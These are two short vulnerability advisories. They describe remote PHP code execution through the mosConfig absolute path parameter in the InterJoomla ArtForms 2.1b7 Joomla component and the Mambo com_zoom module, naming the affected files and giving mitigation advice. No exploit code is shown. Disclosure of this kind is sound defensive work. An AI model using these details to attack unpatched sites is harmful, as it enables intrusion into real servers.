Iskorpitx

Name of the Vulnerable Software and Affected Versions: InterJoomla ArtForms (com artforms) component version 2.1b7 for Joomla! Description: The issue allows remote attackers to execute arbitrary PHP code via a URL in the `mosConfig absolute path` parameter to specific PHP files, including (1) `imgcaptcha.php`, (2) `mp3captcha.php` in `assets/captcha/includes/captchaform/`, or (3) `swfmovie.php` in `assets/captcha/includes/captchatalk/`. Recommendations: For InterJoomla ArtForms (com artforms) component version 2.1b7, consider restricting access to the `mosConfig absolute path` parameter in the affected PHP files until a patch is available. As a temporary workaround, avoid using the `mosConfig absolute path` parameter in the `imgcaptcha.php`, `mp3captcha.php`, and `swfmovie.php` files. At the moment, there is no information about a newer version that contains a fix for this issue.

**Name of the Vulnerable Software and Affected Versions** com zoom module for Mambo versions 2.5 beta 2 and earlier **Description** The issue allows remote attackers to execute arbitrary PHP code. This is achieved by providing a URL in the `mosConfig absolute path` parameter to specific PHP files, including (1) EXIF Makernote.php or (2) EXIF.php in the classes/iptc/ directory. **Recommendations** For com zoom module for Mambo versions 2.5 beta 2 and earlier, consider disabling access to the EXIF Makernote.php and EXIF.php files in the classes/iptc/ directory until a patch is available. Avoid using the `mosConfig absolute path` parameter in the affected module to minimize the risk of exploitation.